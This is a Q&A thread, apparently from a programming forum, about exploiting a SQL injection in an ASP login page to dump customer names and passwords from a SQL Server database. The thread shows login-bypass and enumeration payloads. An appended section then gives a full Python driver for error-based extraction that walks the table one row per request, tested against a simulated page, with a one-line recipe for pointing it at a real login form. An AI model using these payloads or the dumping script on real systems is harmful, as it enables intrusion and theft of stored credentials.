I have a simple web application in ASP with a SQL Server back-end database. The login page has an injection point and I am able to bypass the login with the usual `' OR 1=1`. Now I was able to enumerate the columns in the database using GROUP BY and HAVING statements. I was able to enumerate the information from the error thrown at me.

```
' or '1' = '1' GROUP BY tblCustomers.cust_id, tblCustomers.cust_name, tblCustomers.cust_password, tblCustomers.cust_account
HAVING 1=1 --
```

I am in the learning phase and I found out that the cust_id, cust_name, cust_password, cust_account are the columns and tblCustomers is the table name.

I am also able to use AND statements along with the convert function to enumerate some information. The command I used is `' or '1' = '1' and 1=convert(int,@@version)--` and again I am able to get the information from the errors.

Now, how can I dump the entries in the database to know at least the customer name and password? I tried stacked queries separated by a semicolon, but after executing the first query, i.e. `' OR 1=1`, I just log in and can't see any output as there's no other parameter. I cannot output it anywhere else on the page (there are no parameters and there's just a blank page after I log in). UNION SELECT is not working as I am not able to guess the first SELECT statement and it exits. Are there any functions that can help me dump the customer names and passwords?

I'll really appreciate any help with this. Thanks.

marc_s
Tim
  • Make the 1st query disallow login, i.e. instead of "or 1 = 1" write "and 1 < 1", then the next statement. If I understand correctly where you can inject, login will fail and you'll get your dump (hopefully, but it depends on the portal you are fiddling with). EDIT: BTW, why do you enter a correct user/pwd combo if you want the query to fail? + you can kinda figure out the login query, it should be very simple (user name & password, perhaps?) –  Jun 05 '16 at 15:57
  • Thanks Mark. I tried your suggestion: ` and 1<1 ; SELECT * from tblCustomers ` This time the login fails and it takes me back to the login prompt again. It's just a learning web application, so there is absolutely nothing more once one is able to log in. – Tim Jun 05 '16 at 16:08
  • I add this as an answer then, thanks if you accept ;) –  Jun 05 '16 at 17:31
  • try `union select 1,1,1,1` (and again) to count the number of fields in `select`. Success is not guaranteed because the page may stop reading after 1st row. – Alex Kudryashev Jun 05 '16 at 17:33
  • Hi Alex, the query you suggested gives me an error: `Syntax error converting the varchar value 'abraham' to a column of data type int`. I am expecting the first column `cust_id` to be of data type int. Also, I'd like to mention that the error page is a traditional "page not displayed" and contains the information somewhere along with the POST request details. – Tim Jun 05 '16 at 22:34

1 Answer

Make the 1st query disallow login, i.e. instead of "or 1 = 1" write "and 1 < 1", then the next statement. If I understand correctly where you can inject, login will fail and you'll get your dump (hopefully, but it depends on the portal you are fiddling with). EDIT: BTW, why do you enter a correct user/pwd combo if you want the query to fail? + you can kinda figure out the login query, it should be very simple (user name & password, perhaps?)
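As an added example (not code from the question or the answer above): the question already has the ingredient it needs. The `convert(int,@@version)` trick works because SQL Server puts the offending string into the conversion error, and the same error fires when the argument is a scalar subquery instead of `@@version`. So instead of stacked queries, whose second result set the blank login page never renders (the comment about the page stopping after the first row applies), each request asks for one row of `tblCustomers` and reads it back from the error page. The table and column names are the ones the question enumerated; the username field as the injection point, the exact response format, and the simulated target at the bottom are assumptions of this example, and the driver goes beyond the page's single `@@version` query by walking the whole table in `cust_id` order.

```python
import re
from typing import Callable, List, Optional, Tuple

# Names recovered on the page with the GROUP BY / HAVING trick. Everything else
# (the response format, the simulated back end) is an assumption of this example.
TABLE = "tblCustomers"
ID_COL, NAME_COL, PW_COL = "cust_id", "cust_name", "cust_password"

# Matches both the SQL Server 2000 wording quoted in the comments ("Syntax error
# converting the varchar value 'x' to a column of data type int") and the 2005+
# wording ("Conversion failed when converting the varchar value 'x' to data type int").
LEAK_RE = re.compile(
    r"converting the n?varchar value '(.*?)' to (?:a column of )?data type int", re.S)


def build_payload(after_id: Optional[int] = None) -> str:
    """Username-field payload: force a varchar->int conversion error whose text
    carries one row as 'id|name|password'. The '|' separators guarantee the
    string is never a valid integer, and ISNULL keeps a NULL password from
    turning the whole concatenation into NULL (convert(int, NULL) raises nothing).
    When no row remains the subquery yields NULL, 1=NULL is false and the login
    simply fails: that is the end-of-table signal."""
    where = f" WHERE {ID_COL} > {after_id}" if after_id is not None else ""
    subq = (f"SELECT TOP 1 convert(varchar(10), {ID_COL}) + '|' + {NAME_COL} + '|' + "
            f"ISNULL({PW_COL}, '') FROM {TABLE}{where} ORDER BY {ID_COL}")
    return f"' or 1=convert(int,({subq}))--"


def parse_leak(response: str) -> Optional[str]:
    """Pull the leaked value out of the error page, or None if no error fired."""
    m = LEAK_RE.search(response)
    return m.group(1) if m else None


def dump_rows(send: Callable[[str], str], limit: int = 10_000) -> List[Tuple[int, str, str]]:
    """Walk the table in cust_id order, one row per request. `send` submits a
    username value to the login form and returns the response body."""
    rows: List[Tuple[int, str, str]] = []
    after: Optional[int] = None
    while len(rows) < limit:
        leaked = parse_leak(send(build_payload(after)))
        if leaked is None:
            break                               # no conversion error: table exhausted
        id_s, name, pw = leaked.split("|", 2)   # cust_name must not itself contain '|'
        rows.append((int(id_s), name, pw))
        after = int(id_s)
    return rows


# --- Constructed stand-in for the vulnerable ASP login page (not a real target). ---
FAKE_TABLE = [(1, "abraham", "pass1"), (2, "tim", "s3cret"), (5, "alex", "pa|ss")]


def simulated_login(username: str) -> str:
    """Emulates only what this example needs: the page runs the injected
    subquery and returns SQL Server's conversion error verbatim, or a blank page."""
    m = re.search(rf"{ID_COL} > (-?\d+)", username)
    after = int(m.group(1)) if m else None
    for cid, name, pw in FAKE_TABLE:            # FAKE_TABLE is already in cust_id order
        if after is None or cid > after:
            return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07' "
                    f"Syntax error converting the varchar value '{cid}|{name}|{pw}' "
                    "to a column of data type int.")
    return "<html></html>"                      # no error raised; the login just failed


if __name__ == "__main__":
    for row in dump_rows(simulated_login):
        print(row)
```

Against a real target, `send` would be something like `lambda u: requests.post(url, data={"username": u, "password": "x"}).text` (the field names are an assumption; take them from the actual POST). Because the error page is the only output channel, nothing about this depends on the blank post-login page, and each request leaks exactly one row, so a table of N rows costs N+1 requests.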